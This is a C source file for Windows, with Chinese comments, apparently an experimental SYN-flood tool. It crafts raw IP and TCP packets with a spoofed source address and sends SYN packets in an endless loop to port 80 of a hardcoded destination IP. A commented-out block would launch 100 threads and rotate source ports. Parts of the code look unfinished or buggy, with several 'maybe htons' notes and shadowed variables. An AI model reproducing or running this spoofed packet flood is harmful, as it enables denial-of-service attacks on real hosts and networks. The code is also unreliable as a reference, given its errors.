#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"wsock32.lib")
///////////////////////// IP 报头 //////////////////////
typedef struct IPH
{
unsigned char v_and_l;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;
//-------------------------------------------------------------
///////////////// TCP报头 //////////////////
typedef struct tcphdr
{
USHORT SRCPORT;
USHORT DSTPORT;
unsigned int TSEQ;
unsigned int TACK;
unsigned char TLEN;
unsigned char TFLG;
USHORT TWIN;
USHORT TSUM;
USHORT TURG;
// int OPT;
}TCP_HEADER;
//--------------------------------------------------------------
/////////////////////// TCP伪报头 校验用 ////////////////////
typedef struct PSDH
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSD_HEADER;
//--------------------------------------------------------------
////////////////////// 校验函数和发送函数 ///////////////////
USHORT checksum(USHORT *buffer, int size);
int flood();
//--------------------------------------------------------------
WSADATA wsaData;
SOCKET sockMain = (SOCKET)NULL;
sockaddr_in SockAddr;
int ErrorCode = -1,
flag = true,
TimeOut = 2000,
FakeIpNet,
FakeIpHost,
dataSize = 0,
SendSEQ = 0;
//int f;
int S_PORT = 0;
short SrcPort = 0;
char FakeIP[15] = "172.31.180.89",
DestIP[15] ="172.31.180.33";
unsigned short activPort = 40000;
int main()
{
////////////// 初始化各报头 ////////////
IP_HEADER IPH;
TCP_HEADER TCPH;
PSD_HEADER PSDH;
//-----------------------------------------------------------
HANDLE hThread[100];
DWORD dw;
int ErrorCode = -1,
flag = true,
TimeOut = 2000,
FakeIpNet,
FakeIpHost,
dataSize = 0,
SendSEQ = 0;
//int f;
int S_PORT = 0;
short SrcPort = 0;
char FakeIP[15] = "172.31.180.84",
DestIP[15] = "210.2.13.7";
unsigned short activPort = 40000;
//--------------------------------------------------------
if ((ErrorCode = WSAStartup(MAKEWORD(2, 2), &wsaData)) != 0)
{
printf("WSAStartup failed: %d\n", ErrorCode);
system("pause");
return 0;
}
sockMain = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED);
if (sockMain == INVALID_SOCKET)
{
printf("Socket failed: %d\n", WSAGetLastError());
system("pause");
return 0;
}
ErrorCode = setsockopt(sockMain, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));
if (ErrorCode == SOCKET_ERROR)
{
printf("Set sockopt IP failed: %d\n", WSAGetLastError());
system("pause");
return 0;
}
//---------------------------------------------------------
FakeIpNet = inet_addr(FakeIP);
printf_s("%02x\n", FakeIP);
printf_s("%02x\n", FakeIpNet);
FakeIpHost = ntohl(FakeIpNet);
__try
{
ErrorCode = setsockopt(sockMain, SOL_SOCKET, SO_SNDTIMEO, (char*)&TimeOut, sizeof(TimeOut)) == SOCKET_ERROR;
if (ErrorCode == SOCKET_ERROR)
{
printf("sockopt设置超时,LastError:%d\n", WSAGetLastError());
__leave;
}
//memset(&SockAddr, 0, sizeof(sockaddr));
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.s_addr = inet_addr(DestIP);
/*
for (int cf = 0; cf < 100; cf++)
{
hThread[cf] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)flood, 0, 0, &dw);
printf("proc:%d has been set!PORTNUM:%d\n", cf, ntohs(tcpheader.SRCPORT));
SetThreadPriority(hThread[cf], THREAD_PRIORITY_HIGHEST);
ResumeThread(hThread[cf]);
}
*/
flood();
}
//----------------------------------------------
__finally
{
if (sockMain != INVALID_SOCKET)
closesocket(sockMain);
WSACleanup();
}
return 0;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum = 0;
while (size > 1) {
cksum += *buffer++;
size -= sizeof(USHORT);
}
if (size) cksum += *(UCHAR*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (USHORT)(~cksum);
}
//------------------------------------------------/////////////////
int flood()
{
int i = 0, num = 0,DS,ErrorCode=-1;
short SendSEQ=0, activPort=0,SEQ=0;
UCHAR SendBuf[40];
USHORT Check[16];
IP_HEADER IPH = { 0 };
TCP_HEADER TCPH = { 0 };
PSD_HEADER PSDH={ 0 };
//IPH.v_and_l = (4 << 4 | sizeof(IP_HEADER) / 4);
IPH.v_and_l = sizeof(IPH)/4;
IPH.v_and_l += (4 << 4);
printf("%d\n%d", sizeof(short),sizeof(char));
IPH.tos = 2<<5;
IPH.total_len = sizeof(IP_HEADER) + sizeof(TCP_HEADER);
IPH.ident = 0;//unconfirmed
IPH.frag_and_flags = 0;
IPH.ttl = 128;
IPH.proto = IPPROTO_TCP;
IPH.sourceIP = inet_addr(FakeIP);
IPH.destIP = inet_addr(DestIP);
//---------------------------------
memset(Check, 0, 20);
memcpy(Check, &IPH, sizeof(IPH));
IPH.checksum = checksum(Check, sizeof(IPH));
//-0----------------------------
TCPH.DSTPORT =80;//maybe htons
TCPH.SRCPORT = SrcPort;//maybe htons
TCPH.TSEQ = 0;//maybe htons+sendseq
TCPH.TACK = 0;
TCPH.TLEN = 0;
TCPH.TLEN += ((sizeof(TCPH)/4) << 4);
printf("\n%d,%d", sizeof(TCPH), sizeof(TCPH.TLEN));
TCPH.TFLG = 2;
TCPH.TSUM = 0;
TCPH.TWIN = 16384;//maybe htons
TCPH.TURG = 0;
//------------------------------
PSDH.daddr = IPH.destIP;
PSDH.saddr = IPH.sourceIP;
PSDH.mbz = 0;
PSDH.ptcl = IPPROTO_TCP;
PSDH.tcpl = sizeof(TCP_HEADER);//maybe htons
//---------------------------------
memset(Check, 0, sizeof(TCPH)+sizeof(PSDH));
memcpy(Check, &PSDH, sizeof(PSDH));
while (1)
{
memcpy(Check + sizeof(PSDH), &TCPH, sizeof(TCPH));
TCPH.TSUM = checksum(Check, sizeof(PSDH) + sizeof(TCPH));
/*
if (SendSEQ++ == 65536) SendSEQ = 1;
if (activPort++ == 40010) activPort = 1000;
// printf("pros:%d,SendSEQ:%d,activport:%d\n", t, SendSEQ, activPort);
IPH.checksum = 0;
//TCPH.sourceIP = htonl(FakeIpHost + SendSEQ);
TCPH.TSEQ = htonl(SEQ + SendSEQ);
TCPH.SRCPORT = htons(activPort);
TCPH.TSUM = 0;
PSDH.saddr = IPH.sourceIP;
memcpy(SendBuf, &PSDH, sizeof(PSD_HEADER));
memcpy(SendBuf + sizeof(PSD_HEADER), &TCPH, sizeof(TCP_HEADER));
TCPH.TSUM = checksum((USHORT *)SendBuf, sizeof(PSD_HEADER) + sizeof(TCP_HEADER));
*/
memcpy(SendBuf, &IPH, sizeof(IP_HEADER));
memcpy(SendBuf + sizeof(IP_HEADER), &TCPH, sizeof(TCPH));
//memset(SendBuf + sizeof(IP_HEADER) + sizeof(TCPH), 0, 4);
DS = sizeof(IPH) + sizeof(TCPH);
//IPH.checksum = checksum((USHORT *)SendBuf, DS);
//memcpy(SendBuf, &IPH, sizeof(IPH));
ErrorCode = sendto(sockMain, (char*)SendBuf, DS, 0, (struct sockaddr*) &SockAddr, sizeof(sockaddr_in));
printf("portnum:%d\n", ntohs(TCPH.SRCPORT));
if (ErrorCode == SOCKET_ERROR)
{
if (i == 0)
{
printf("\nCan't connect this IP!Pls check it.\n");
ExitThread(1);
}
else
{
printf("Process killed\n%d tcp quests have been sent\n\n", num);
ExitThread(1);
}
}
/*
else if (i == 0)
{
i++;
num++;
//f = num;
// printf("portnum:%d\n", ntohs(tcpheader.th_sport));
//tcpheader.th_sport = htons(++S_PORT);
TCPH.SRCPORT = htons(0);
}
else
{
num++;
//f = num;
// printf("portnum:%d\n", ntohs(tcpheader.th_sport));
//tcpheader.th_sport = htons(++S_PORT);
TCPH.SRCPORT = htons(0);
}
// printf("Errocode:%d\n", ErrorCode);
//system("pause");
*/
printf("\n%d,%d", sizeof(IPH), sizeof(TCPH));
Sleep(500);
}
return 0;
}